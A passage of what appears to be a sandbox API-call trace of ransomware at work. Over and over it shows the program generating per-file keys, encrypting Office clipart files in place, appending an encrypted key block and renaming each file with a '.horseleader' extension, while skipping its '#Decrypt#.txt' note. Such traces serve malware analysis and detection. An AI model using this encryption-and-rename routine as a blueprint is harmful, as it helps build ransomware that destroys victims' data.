lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.931] CloseHandle (hObject=0x158) returned 1 [0252.931] GetProcessHeap () returned 0x780000 [0252.931] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.931] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.horseleader") returned 79 [0252.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf.horseleader")) returned 1 [0252.932] GetProcessHeap () returned 0x780000 [0252.932] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.932] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa4c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04174_.WMF", cAlternateFileName="")) returned 1 [0252.932] lstrcmpiW (lpString1="AN04174_.WMF", lpString2="Windows") returned -1 [0252.932] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 67 [0252.932] StrStrIW (lpFirst="AN04174_.WMF", lpSrch=".horseleader") returned 0x0 [0252.932] lstrcmpW (lpString1="AN04174_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.932] lstrcmpW (lpString1="AN04174_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.932] lstrlenW (lpString=".testttjffg") returned 11 [0252.932] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.932] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.932] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.932] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.934] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 67 [0252.934] StrStrW (lpFirst="AN04174_.WMF", lpSrch=".txt") returned 0x0 [0252.934] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2636) returned 1 [0252.934] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xa4c, lpOverlapped=0x0) returned 1 [0252.936] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff5b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.936] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xa4c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xa4c, lpOverlapped=0x0) returned 1 [0252.936] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.937] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.937] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.937] CloseHandle (hObject=0x158) returned 1 [0252.937] GetProcessHeap () returned 0x780000 [0252.937] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.937] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.horseleader") returned 79 [0252.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf.horseleader")) returned 1 [0252.938] GetProcessHeap () returned 0x780000 [0252.938] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.938] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x19ec, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04191_.WMF", cAlternateFileName="")) returned 1 [0252.938] lstrcmpiW (lpString1="AN04191_.WMF", lpString2="Windows") returned -1 [0252.938] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 67 [0252.938] StrStrIW (lpFirst="AN04191_.WMF", lpSrch=".horseleader") returned 0x0 [0252.938] lstrcmpW (lpString1="AN04191_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.938] lstrcmpW (lpString1="AN04191_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.938] lstrlenW (lpString=".testttjffg") returned 11 [0252.939] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.939] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.939] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.939] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.939] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 67 [0252.939] StrStrW (lpFirst="AN04191_.WMF", lpSrch=".txt") returned 0x0 [0252.939] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6636) returned 1 [0252.940] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x19ec, lpOverlapped=0x0) returned 1 [0252.942] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe614, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.942] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x19ec, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x19ec, lpOverlapped=0x0) returned 1 [0252.943] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.943] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.943] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.943] CloseHandle (hObject=0x158) returned 1 [0252.943] GetProcessHeap () returned 0x780000 [0252.943] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.943] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.horseleader") returned 79 [0252.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf.horseleader")) returned 1 [0252.945] GetProcessHeap () returned 0x780000 [0252.945] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.945] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1204, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04195_.WMF", cAlternateFileName="")) returned 1 [0252.945] lstrcmpiW (lpString1="AN04195_.WMF", lpString2="Windows") returned -1 [0252.945] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 67 [0252.945] StrStrIW (lpFirst="AN04195_.WMF", lpSrch=".horseleader") returned 0x0 [0252.945] lstrcmpW (lpString1="AN04195_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.945] lstrcmpW (lpString1="AN04195_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.945] lstrlenW (lpString=".testttjffg") returned 11 [0252.945] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.945] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.945] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.946] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.946] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF") returned 67 [0252.946] StrStrW (lpFirst="AN04195_.WMF", lpSrch=".txt") returned 0x0 [0252.946] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4612) returned 1 [0252.946] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1204, lpOverlapped=0x0) returned 1 [0252.949] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffedfc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.949] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1204, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1204, lpOverlapped=0x0) returned 1 [0252.950] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.950] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.950] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.950] CloseHandle (hObject=0x158) returned 1 [0252.950] GetProcessHeap () returned 0x780000 [0252.950] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.950] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.horseleader") returned 79 [0252.950] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf.horseleader")) returned 1 [0252.951] GetProcessHeap () returned 0x780000 [0252.952] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.952] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xc48, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04196_.WMF", cAlternateFileName="")) returned 1 [0252.952] lstrcmpiW (lpString1="AN04196_.WMF", lpString2="Windows") returned -1 [0252.952] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 67 [0252.952] StrStrIW (lpFirst="AN04196_.WMF", lpSrch=".horseleader") returned 0x0 [0252.952] lstrcmpW (lpString1="AN04196_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.952] lstrcmpW (lpString1="AN04196_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.952] lstrlenW (lpString=".testttjffg") returned 11 [0252.952] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.952] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.952] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.952] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.953] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF") returned 67 [0252.954] StrStrW (lpFirst="AN04196_.WMF", lpSrch=".txt") returned 0x0 [0252.954] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3144) returned 1 [0252.954] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xc48, lpOverlapped=0x0) returned 1 [0252.970] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff3b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.970] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xc48, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xc48, lpOverlapped=0x0) returned 1 [0252.970] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.970] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.970] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.971] CloseHandle (hObject=0x158) returned 1 [0252.971] GetProcessHeap () returned 0x780000 [0252.971] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.971] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.horseleader") returned 79 [0252.971] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04196_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04196_.wmf.horseleader")) returned 1 [0252.972] GetProcessHeap () returned 0x780000 [0252.972] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.972] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1df4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04206_.WMF", cAlternateFileName="")) returned 1 [0252.972] lstrcmpiW (lpString1="AN04206_.WMF", lpString2="Windows") returned -1 [0252.972] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 67 [0252.972] StrStrIW (lpFirst="AN04206_.WMF", lpSrch=".horseleader") returned 0x0 [0252.972] lstrcmpW (lpString1="AN04206_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.972] lstrcmpW (lpString1="AN04206_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.972] lstrlenW (lpString=".testttjffg") returned 11 [0252.972] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.972] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.973] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.975] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF") returned 67 [0252.975] StrStrW (lpFirst="AN04206_.WMF", lpSrch=".txt") returned 0x0 [0252.975] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7668) returned 1 [0252.975] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1df4, lpOverlapped=0x0) returned 1 [0252.977] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe20c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.977] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1df4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1df4, lpOverlapped=0x0) returned 1 [0252.978] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.978] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.978] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.978] CloseHandle (hObject=0x158) returned 1 [0252.978] GetProcessHeap () returned 0x780000 [0252.978] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.978] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.horseleader") returned 79 [0252.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04206_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04206_.wmf.horseleader")) returned 1 [0252.979] GetProcessHeap () returned 0x780000 [0252.979] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.979] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x212c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04225_.WMF", cAlternateFileName="")) returned 1 [0252.979] lstrcmpiW (lpString1="AN04225_.WMF", lpString2="Windows") returned -1 [0252.979] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned 67 [0252.980] StrStrIW (lpFirst="AN04225_.WMF", lpSrch=".horseleader") returned 0x0 [0252.980] lstrcmpW (lpString1="AN04225_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.980] lstrcmpW (lpString1="AN04225_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.980] lstrlenW (lpString=".testttjffg") returned 11 [0252.980] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.980] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.980] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft 